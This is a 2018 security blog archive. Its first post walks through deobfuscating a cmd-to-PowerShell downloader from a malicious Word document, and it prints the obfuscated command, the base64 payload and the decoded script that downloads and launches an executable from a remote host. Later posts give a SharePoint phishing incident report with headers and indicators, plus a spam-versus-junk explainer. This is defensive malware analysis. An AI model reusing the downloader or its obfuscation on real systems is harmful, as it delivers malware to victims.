Tech from the Trenches: 2018

Wednesday, August 22, 2018

Fun Little Decoding of Obfuscated CMD Line to Run PowerShell Cmd

This came from a malicious Word doc titled John_Townsend_Request.doc.
SHA256 e1a68aaba205c7b7336d4f19627f54f891f5bc504372e575941d38cbcab42546

Original Command Line Arguments:

Cmd /v^:^O ^ ^ /r s^e^T ^ ^ UMn^l^=p^ow)r^sh)l^l^ -)^ ^:^ABoA^#4Ad^Q^A9^A^#4^A`Q^B^3AC^0^A^bwB^iA^#oA^`QB^j^A^gQA^IABO^A#U^A^dA
Au^AFcA^`^Q^Bi^A(^MAb^A^BpA#^U^Ab^$^B0ADsA^:^A^B^p^A#^$^A.A^A9^ACcA^a^AB0
^Ag^Q^AcAA6AC8^A^LwB^j^A^#8A^b$^Bn^A#n^A)$BlA^gIAL^$^B^j^A#^8^A^b^Q^Av^A^g
QAc^w^B0^AC^8A^aQBu^A#^QA^`Q^B4AC4^Ac^A^BoA^g^A^APw^B^s^AD0AcwBvA^#$A^
bwA1AC4Ad^ABrA#4^A:^w^AuA^FM^Ac^A^B^sA^#nAdAA^o^ACc^AQ^A^A+^ACnAO^w^A
n^A#nAd^A^B^F^ACA^APQ^A$^ACcA^\^w^A^4A^D(^A^:^wA7AC^QA^S^$^B^gAgU^A^P^Q
An^A#UAb^$B2A^D^oAcA^B,^A#I^Ab^A^Bp^A^#MAKw^A^+AF^w^A:wArAC^Q^A^aQ^B^0
^A(^UAKwA+AC4A^`Q^B^4A#U^A^:w^A^7A#Y^Abw^B^yA#^UAY^QBjA#$^AK^A^AnA^FQ
^AR^A^B^6ACA^A^a^QBuAC^A^A^:^A^Bp^A#$A.AApAgs^AdAByAgn^A)^w^An^A#^$^Ab$
^B^,^AC^4^AR^ABv^AgcAb^$^B^sA^#8A^YQBn^A(^Y^AaQ^Bs^A^#UA^K^AAn^A^FQ^AR^
A^B^6^AC^wA^I^AAnA(^oAR^wB^,ACn^AO^w^B^:^A#4Ad^$^Bv^A^#s^A`Q^A^tA(nAdAB^l
^A#^0A^IAAn^A(^oAR^w^B^,^AD^sAY$^By^A#U^AY^Q^Br^A^D^sA^f^QB^jA#(Ad^ABjA^#$^A)^w^B^9A^g0A^I^AA$AC^A^A^I^A^A$^ACA^AI^AA^$ACAA^I^AA^$^ACA
A^I^AA$^ACA^A^IAA$AA^=^=& sE^t ^ ^ Z^s^Lm=^!^UMn^l^:n=^k!& s^E^t ^ Rv^y=^!^Z^s^Lm:^g^=H^!& s^E^T ch^a^m=!Rv^y^:\=N^!& sE^T ^ ^dm=^!ch^a^m^:^$=^g^!&&S^e^T ^ ^ ^M^m^xs=^!^d^m:)=^e^!&&S^eT ^ ^ ^ H^J^o=^!^M^m^xs^:1=^z!& se^t ^ ^ ^q^zy=^!^H^J^o^::^=^J!&&s^et ^ ^x^e5C=!^q^zy:`^=^Z^!&& s^e^T ^ ^ ^ ^K^6^8=^!^x^e^5C^:^,^=^1!& se^t ^ ^ ^68V=!^K^6^8:^+^=n^!& se^T ^ q^F=!^6^8V^:(^=^E^!&& s^e^t ^ ^ ^8lW^m=^!q^F^:^.^=^W^!& S^ET E^3=^!^8^l^W^m:^#^=G^!&&ca^L^L %E^3%

Step 1. Remove Filler Noise character "^"

Cmd /v:O /r seT UMnl=pow)rsh)ll -) :ABoA#4AdQA9A#4A`QB3AC0AbwBiA#oA`QBjAgQAIABOA#UAdAAuAFcA`QBiA(MAbABp
A#UAb$B0ADsA:ABpA#$A.AA9ACcAaAB0AgQAcAA6AC8ALwBjA#8Ab$BnA#nA)$BlAgIAL
$BjA#8AbQAvAgQAcwB0AC8AaQBuA#QA`QB4AC4AcABoAgAAPwBsAD0AcwBvA#$AbwA
1AC4AdABrA#4A:wAuAFMAcABsA#nAdAAoACcAQAA+ACnAOwAnA#nAdABFACAAPQA$
ACcA\wA4AD(A:wA7ACQAS$BgAgUAPQAnA#UAb$B2ADoAcAB,A#IAbABpA#MAKwA+A
FwA:wArACQAaQB0A(UAKwA+AC4A`QB4A#UA:wA7A#YAbwByA#UAYQBjA#$AKAAnAF
QARAB6ACAAaQBuACAA:ABpA#$A.AApAgsAdAByAgnA)wAnA#$Ab$B,AC4ARABvAgcA
b$BsA#8AYQBnA(YAaQBsA#UAKAAnAFQARAB6ACwAIAAnA(oARwB,ACnAOwB:A#4Ad
$BvA#sA`QAtA(nAdABlA#0AIAAnA(oARwB,ADsAY$ByA#UAYQBrADsAfQBjA#(AdABjA#$A)wB9Ag0AIAA$ACAAIAA$ACAAIAA$ACAAIAA$ACAAIAA$ACAAIAA$AA==
& sEt ZsLm=!UMnl:n=k!& sEt Rvy=!ZsLm:g=H!& sET cham=!Rvy:\=N!& sET dm=!cham:$=g!&&SeT Mmxs=!dm:)=e!&&SeT HJo=!Mmxs:1=z!& set qzy=!HJo::=J!&&set xe5C=!qzy:`=Z!&& seT K68=!xe5C:,=1!& set 68V=!K68:+=n!& seT qF=!68V:(=E!&& set 8lWm=!qF:.=W!& SET E3=!8lWm:#=G!&&caLL %E3%

Step 2. Capture CMD line as it runs in Sandbox to get character substitutes

# = G
( and ) = E
` = Z
$ = g
n = k

powershell -e JABoAG4AdQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEM
AbABpAGUAbgB0ADsAJABpAGgAWAA9ACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBkAGk
AegBlAHIALgBjAG8AbQAvAHQAcwB0AC8AaQBuAGQAZQB4AC4AcABoAHAAPwBsAD0A
cwBvAGgAbwAzAC4AdABrAG4AJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAGkA
dABFACAAPQAgACcANwA4ADEAJwA7ACQASgBHAHUAPQAkAGUAbgB2ADoAcAB1AGI
AbABpAGMAKwAnAFwAJwArACQAaQB0AEUAKwAnAC4AZQB4AGUAJwA7AGYAbwByA
GUAYQBjAGgAKAAkAFQARAB6ACAAaQBuACAAJABpAGgAWAApAHsAdAByAHkAewAk
AGgAbgB1AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFQARAB6ACwAIAAk
AEoARwB1ACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEoARwB1ADsAYgByAG
UAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACA
AIAAgACAAIAAgAA==

Step 3. Base64 Decode

$�h�n�u�=�n�e�w�-�o�b�j�e�c�t� �N�e�t�.�W�e�b�C�l�i�e�n�t�;�$�i�h�X�=�'�h�t�t�p�:�/�/�c�o�n�d�i�z�e�r�.�c�o�m�/�t�s�t�/�i�n�d�e�x�.�p�h�p�?�l�=�s�o�h�o�3�.�t�k�n�'�.�S�p�l�i�t�(�'
�@�'�)�;�$�i�t�E� �=� �'�7�8�1�'�;�$�J�G�u�=�$�e�n�v�:�p�u�b�l�i�c�+�'�\�'�+�$�i�t
�E�+�'�.�e�x�e�'�;�f�o�r�e�a�c�h�(�$�T�D�z� �i�n� �$�i�h�X�)�{�t�r�y�{�$�h�n�u�.�D�o�w�n�l�o�a�d�F�i�l�e�(�$
�T�D�z�,� �$�J�G�u�)�;�I�n�v�o�k�e�-�I�t�e�m� �$�J�G�u�;�b�r�e�a�k�;�}�c�a�t�c�h�{�}�}� � � � � � � � � � � � � � � � � �

Step 4 Remove spacer character "�"

(Decoded: $hnu=new-object Net.WebClient;$ihX='hxxp://condizer[.]com/tst/index.php?l=soho3.tkn'.Split('@');$itE = '781';$JGu=$env:public+'\'+$itE+'.exe';foreach($TDz in $ihX){try{$hnu.DownloadFile($TDz, $JGu);Invoke-Item $JGu;break;}catch{}} )

Tuesday, May 15, 2018

Sharepoint Email Phishing

Summary:

At about 12:33 PM Eastern an E-mail was delivered to multiple mailboxes within the company. These purported to be from an internal employee. The address was legitimate and was not obfuscated to hide a different originating address. There were at least two variations of the email. Both emails contained links to a malicious domain (sued[.]co[.]ke) Link was hidden behind an alternate text that said “DownloadAttachments”. Clicking the link would prompt some users to enter their email address and password.

The URL and parent domain were immediately added to the company's Umbrella solution to prevent any furtherDNS resolution to the domain when users click on the link.

The IP addresses that the link resolved to were added to the firewalls at all sites to be shunned.

It appears that approximately 35 – 40 users clicked on the link and entered credentials. All users that have contacted IT Support or HelpDesk have had their domain password changed.

Investigation leads to this email having come from an external IP address and not necessarily sent from an internal device. The Originating IP address in the email header is unknown by threat intel resources. The addresses is located in Illinois, coming from a VPN block that belongs to LogicWeb. There are no domains hosted at this IP.

The email body was created in Gmail as indicated by the tags around the source and the alternate text to the Sharepoint logo appears to be in Spanish: img alt="Resultado de imagen para sharepoint logo"

Known malicious sample download

SHA256 - f9e8e6107cb0ff5ad3b891ad99580aac57eaa8f519c8ba9baa9c779d4b6f68f8

File Type: HTML

Magic: HTML document text

SSDeep: 768:DHxjTggziQuAr7SpF9G9h919/ozio/InD:6GiQuAr7SpEozio/ID

File Size: 28.77 KB

Main detection: Trojan.HTML.Phishing

Domain Info

Domain Name: sued.co.ke

IP Addresses Resolved to:

· 208.91.199.87

· 162.213.252.60 <-- All our traffic was centered around this IP

Screenshot of the email:

E-Mail Message Sample 1 Header and Source

Received: from BN7xxxxxxx113.xxxxxxx.prod.outlook.com (2603:10b6:4:ae::39) by

DMxxxxxB4105.xxxxxx.prod.outlook.com with HTTPS via

DM5xxxx0.NAMxxx07.PROD.OUTLOOK.COM; Mon, 14 May 2018 16:33:27 +0000

Authentication-Results: domain.com; dkim=none (message not signed)

header.d=none;domain.com; dmarc=none action=none

header.from=<company name>;

From: "Dennis B. Manning" <dennis.manning@bioglobal.co>

To: "Dennis B. Manning" <dennis.manning@bioglobal.co>

Subject: INVOICE

Thread-Topic: INVOICE

X-MS-Exchange-Organization-MessageDirectionality: Originating

X-MS-Exchange-Organization-AuthSource: BN7PRxxxxmprd04.prod.outlook.com

X-MS-Exchange-Organization-AuthAs: Internal

X-MS-Exchange-Organization-AuthMechanism: 04

X-Originating-IP: [173.239.199.110]

X-MS-Exchange-Organization-Network-Message-Id: 61d1100c-e50e-4798-2591-08d5b9b868a9

X-MS-PublicTrafficType: Email

X-Microsoft-Exchange-Diagnostics: 1;BN7PR04MB4307;35:hYQ8ykDJvNTkVuzaeSsSAZpmmFrC1R5Ulntep7gMcSI/UhbDiIALU6UQOhBeYZY2UCllhTuswM3SWrmuDe6GIw==

Return-Path: dennis.manning@bioglobal.co

X-MS-Exchange-Organization-ExpirationStartTime: 14 May 2018 16:33:22.6051

(UTC)

X-MS-Exchange-Organization-ExpirationStartTimeReason: Original Submit

X-MS-Exchange-Organization-ExpirationInterval: 2:00:00:00.0000000

X-MS-Exchange-Organization-ExpirationIntervalReason: Original Submit

X-Microsoft-Antispam: UriScan:;BCL:0;PCL:0;

E-Mail Message Sample 2 Header and Source

Received: from BN7xxxx04.xxxxxxx4.prod.outlook.com (2603:10b6:4:ae::44) by

DxxxxxB4105.namprd04.prod.outlook.com with HTTPS via

DM5xxxx0115.NAxxx07.PROD.OUTLOOK.COM; Mon, 14 May 2018 16:34:11 +0000

Received: from BNxxxxxB4050.xxxxxx.prod.outlook.com (20.176.18.18) by

BN7Pxxxx04.xxxx4.prod.outlook.com (20.xx6.xx.155) with Microsoft SMTP

Server (version=TLS1_2, cipher=TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384_P256) id

15.20.755.16; Mon, 14 May 2018 16:34:09 +0000

Authentication-Results: teijin.co.jp; dkim=none (message not signed)

header.d=none;teijin.co.jp; dmarc=none action=none

header.from=<Company name>;

From: "Dennis B. Manning" <dennis.manning@bioglobal.co>

To: "Dennis B. Manning" <dennis.manning@bioglobal.co>

Subject: INVOICE

Thread-Topic: INVOICE

Date: Mon, 14 May 2018 16:34:04 +0000

X-Originating-IP: [173.239.199.110]

E-Mail Body Source Code (interesting sections)

<a href="http://sued.co.ke/sharepoint/sharepoint/" rel="noopener noreferrer" id="LPlnk981628" class="gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-m_741264181270171108gmail-OWAAutoLink gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-OWAAutoLink gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-OWAAutoLink OWAAutoLink" target="_blank" style="color:rgb(17,85,204)" previewremoved="true"><span id="gmail-m_-5254795068973409301gmail-m_3735968270271966208gmail-m_1095737800804209384m_-8407371155946476852gmail-m_-8252052683460989792gmail-m_6238816748888944654gmail-m_741264181270171108gmail-m_2205792334074373374gmail-LPlnk375107" style="font-size:16px; background-color:transparent">DownloadAttachments</a>

First Query seen in SC

May 14 09:41:14 nnm: 10.x.x.101:53|10.x.x.111:53|17|7024|DNS Client Queries|PVS has observed this host perform a DNS lookup. The most recent DNS query performed was for: |sued.co.ke to the server at 10.x.x.111|

SecurityCenter Events

· 530 Web_Request events tracked by SC. Almost all were GET requests for .css files. The ones below were unique in the list of GET/POST events:

HTTP request detection|The following GET/POST request was observed:|DIP: 162.213.252.60:80 Type: POST;URI: /?wc-ajax=get_refreshed_fragments;Referer: http://sued.co.ke/sharepoint/sharepoint/Office%20365_files/SuiteServiceProxy.htm

Random Variations (showed up 4 or 5 times out of 140 events):

GET;URI: /s/opensans/v15/mem5YaGs126MiZpBA-UN_r8OXOhv.woff;

GET;URI: /sharepoint/sharepoint/Office%20365_files/shellwofficons_f991c945.woff;

Spam vs. Junk

...And what to do about it.

There is a difference between emails. There is spam and there is junk. Do you know the what the difference is? Junk is anything that comes from a legitimate source, usually in the form of a marketing email. Spam comes from a less-than ethical source and can take any form. Usually with the intent of getting a user to click on a link. The link can then lead to a variety of sites with varying purposes. If the email is a 'Phishing" email, then the intent is to get you to provide credentials or other sensitive information that can then be utilized by the threat actor to perform some nefarious action.

The other type of link is to provide you with a piece of malicious software and that is usually without your consent or knowledge. This can allow even more serious activity to take place on your system and with your data. In the rare case, the link will provide both a place to enter in credentials and a download to your system. In all three cases, company data and personal data are placed at great risk.

Junk mail on the other hand just fills your mailbox and provides you the activity of having to take time to delete it. Not nefarious, just a pain.

Training users to know the difference and how to respond to it can save a lot of work for the security analyst.

For instance, in Outlook there is an option to set up Junk E-mail Options. This can be a great tool for end users, but they must be trained on what it means to them and their daily mail habits. Not only junk will get caught by this, and new addresses need to be constantly added to the Safe Senders list.

Wednesday, March 21, 2018

Bring Out Your Dead, Bring Out Your Dead!

Well, as the title says; I am bringing out my dead. My dead blog that is. I have been away for a couple years and much has changed. I have progressed quite far now in my security field and have many new skills. I am hoping to share some of what I learn with you in what I hope will be an entertaining and educational way.
Progressing into malware analysis and will be sharing the results of that as far as samples I analyze and things I discover.
Also, have something to say about recent events. To start with; the 'SlingShot' campaing as discovered and named by Kaspersky. At a point earlier this month there was a report published by Kaspersky and it detailed activity targeting many Middle East Countries and some in Africa. It explained the hack was being done by hacking into Mikrotik routers. The main piece of malware being by the group has been dubbed Slingshot based on strings found by researchers.
Cyberscoop has now claimed that they have learned that Slingshot is actually and operation of the US military's Joint Special Operations Command which is a component of Special Operations and is aimed at members of terrorists organizations such as ISIS and al-Qaeda. The source that gave the information to Cyberscoop has expressed concern that the exposure of the campaign may result in both the loss of a valuable surveillance program and the endangerment of the lives of US soldiers.
Most likely the Slingshot infrastructure has been abandoned following the disclosure.
Who knows what the repercussions from this will be, only time will tell.